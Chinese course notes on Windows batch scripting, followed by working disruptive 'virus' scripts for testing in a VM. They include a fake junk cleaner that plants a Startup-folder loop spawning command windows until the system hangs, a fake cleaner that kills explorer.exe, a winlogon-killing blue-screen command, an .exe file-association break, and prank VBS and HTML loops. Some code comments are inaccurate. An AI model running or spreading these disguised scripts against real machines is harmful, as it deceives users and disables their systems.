千鋒教育網路安全學習筆記2:批處理、病毒
阿新 • • 發佈:2020-12-02
目錄
初始批處理
一個簡單的批處理程式
1、引入
2、echo輸出
3、變數
4、if 、goto
病毒
簡單的批處理檔案一
簡單的批處理檔案二
最簡單的病毒
最簡單的病毒解藥
最簡單的指令碼
最簡單的死迴圈指令碼
整人網頁
初始批處理
- 如何批處理
命名: 字尾名為.bat
方法:建立一個記事本檔案,然後將其後綴名改為.bat
- 批處理作用:自上而下成批處理每一條DOS命令,直到執行到最後一條
- 執行環境:DOS視窗
一個簡單的批處理程式
1、引入
1 d: 2 cd \ 3 cd temp 4 del *.* /s/p #無詢問狀態下刪除所有檔案
我們把幾條dos命令會聚在一起,這就進入了批處理的範疇
2、echo輸出
1 @echo off #關閉回顯 2 color 0a #改變顏色 color?查詢如何使用 3 title 飛哥小程式v1.0 #設定程式名字 4 5 echo ===================== 6 echo 選單 7 echo 1、修改管理員密碼 8 echo 2、定時關機 9 echo 3、退出本程式 10 echo ===================== 1112 pause #暫停一哈螢幕給俺瞅瞅
3、變數
1 @echo off #關閉回顯 2 color 0a #改變顏色 color?查詢如何使用 3 title 飛哥小程式v1.0 #設定程式名字 4 5 echo ===================== 6 echo 選單 7 echo 1、修改管理員密碼 8 echo 2、定時關機 9 echo 3、退出本程式 10 echo ===================== 11 12pause #暫停一哈螢幕給俺瞅瞅 13 14 15 set /p usename=請輸入使用者名稱: #獲取輸入的字串,並將其賦值給變數username 16 set /p password=請輸入密碼: 17 net user %username% %password% >nul #修改賬戶密碼 18 #其中>nul代表若成功執行則把結果輸出到虛空裡,而不是螢幕上哦 19 20 pause
注:上述程式碼中#號之後的僅為註釋,使用時要刪除掉
4.if、goto
1 @echo off 2 color 0a 3 title 飛哥小程式v1.0 4 5 6 :menu #相當於一個以menu為名字的分支 7 cls #清屏 8 echo======================= 9 echo 選單 10 echo 1、修改管理員密碼 11 echo 2、定時關機 12 echo 3.退出本程式 13 echo======================= 14 15 16 set /p answer=請輸入您的選擇: #answer後面千萬不能有空格 17 18 if %answer%==1 goto 1 19 20 if %answer%==2 goto 2 21 22 if %answer%==3 goto 3 23 24 echo 別亂輸入哦,只能輸入1、2、3哦 25 26 pause 27 goto menu 28 29 :1 #相當於一個以1為名字的分支 30 set /p u=請輸入使用者名稱: 31 set /p p=請輸入新密碼: 32 net user %u% %p% >nul 33 pause 34 goto menu 35 36 :2 37 set /p time=請輸入時間: 38 shutdown -s -t %time% 39 set /p x=是否取消(1:是,0:否): 40 if %x%==1 shutdown -a 41 42 pause 43 goto menu 44 45 46 :3 47 exit
常用的shutdown命令可在DOS視窗輸入shutdown ?檢視使用方法
病毒
測試環境:虛擬機器win2003
注:虛擬機器上隨你玩,真機玩了等重灌吧
簡單的批處理檔案一
功能:偽裝垃圾清理程式新增一個開機自啟動項,無限彈出DOS視窗直至電腦宕機
1 @echo off 2 title 系統垃圾清理 3 color 2f 4 echo ====若防毒軟體惡意攔截,請選擇【允許程式的所有操作】==== 5 echo. #代表空出一行 6 echo. 7 echo :start>c:\windows\windows.bat #這句話的含義是輸出:start這句話並寫到後面的檔案中 8 echo start cmd >>c:\windows\windows.bat #這句話的含義是輸出start cmd這句話並以追加的形式寫到後面的檔案中 9 echo goto start>>c:\windows\windows.bat 10 copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\Startup\" >nul 11 #上面一行表示將檔案拷貝到當前使用者啟動選單位置 12 if %errorlevel%==0 goto next 13 copy c:\windows\windows.bat "%USERPROFILE%\「開始」選單\程式\啟動" >nul 14 #%USERPROFILE%是win定義的一個系統變數,代表當前使用者所在的系統目錄 15 if %errorlevel%==1 goto error 16 :next 17 echo. 18 echo. 19 echo ====== 垃圾清理中,請不要關閉視窗====== 20 echo. 21 ping -n 5 127.0.0.1 >nul 22 echo. 23 echo ====== 垃圾清理完畢,共清理垃圾500M=== 24 echo. 25 echo. 26 echo ====== 建議立即重啟電腦 27 pause 28 goto ex 29 30 :error 31 echo. 32 echo. 33 echo ====== 程式執行失敗,請使用【管理員許可權】重新執行!====== 34 echo. 35 pause 36 goto ex 37 38 :ex 39 exit
注:上面的啟動目錄只針對winxp和win2003,其他系統的請自行百度
簡單的批處理檔案二
功能:偽裝桌面清理程式,強制終止桌面程式
1 @echo off 2 title 系統垃圾清理 3 color 2f 4 echo ======若有防毒軟體惡意攔截,請選擇【允許程式的所有操作】===== 5 echo . 6 echo . 7 8 :next 9 echo . 10 echo . 11 echo ======垃圾清理中,請不要關閉視窗哦====== 12 echo . 13 ping -n 5 127.0.0.1 >nul 2>nul 14 taskkill /im explorer.exe /f >nul 2>nul #殺掉相應的程序,其中/im 後面跟的是程序名 /f強制 15 echo . 16 ping . =====完了,你係統廢了,桌面程式不見了,不信你看看====== 17 ping -n 5 127.0.0.1 >nul 2>nul 18 echo . 19 start c:\windows\explorer.exe #開啟對應的程序 20 echo . 21 echo ======一切盡在我掌控中,已然是修復好了,你瞅瞅桌面程式===== 22 pause
最簡單的藍屏炸彈檔案
ntsd -c q -pn winlogon.exe
分析:
ntsd #殺死程序
ntsd -c q -pn 程序名 #強制殺死程序
藍屏原因:winlogon.exe程序不能被殺死,我想強制殺死,系統不讓,結果導致藍屏!
對win2003有很大的殺傷力,但對win2008基本沒殺傷力
最簡單的病毒
1 assoc .exe=txtfile
分析:
修改檔案關聯,導致檔案無法正常開啟
測試效果如下圖:
最簡單的病毒解藥
1 assoc .exe=exefile 2 #即將字尾改為之前的一一對應
最簡單的指令碼
方法:將下面程式碼寫入記事本,並將記事本的字尾名字改為.vbs
1 msgbox "我最帥!"
最簡單的死迴圈指令碼
1 do 2 msgbox "smile" 3 msgbox "jhw" 4 msgbox "hhh" 5 loop
效果:視窗無法關閉
解決方法:
vbs是使用微軟自帶的wscript.exe來編寫的
開啟工作管理員將其對應的程序殺死即可
整人網頁
將以下程式碼寫到記事本中儲存後改字尾名為.html即可
1 <!DOCTYPE html> 2 <html> 3 <head> 4 <meta charset="utf-8"> 5 <meta http-equiv="X-UA-Compatible" content="IE=edge"> 6 <title>很噁心的常見整人效果的程式碼</title> 7 <link rel="stylesheet" href=""> 8 </head> 9 <body> 10zhengren <a href="" onmouseover="alert('飛哥真帥'); 11 alert('飛哥真帥'); 12 alert('飛哥是真帥'); 13 alert('飛哥是真帥'); 14 alert('飛哥是真的帥'); 15 alert('同意不!'); 16 alert('不同意?'); 17 alert('去死吧'); 18 ">不許把滑鼠移到這裡!</a>點了真爽!!! 19 </body> 20 </html>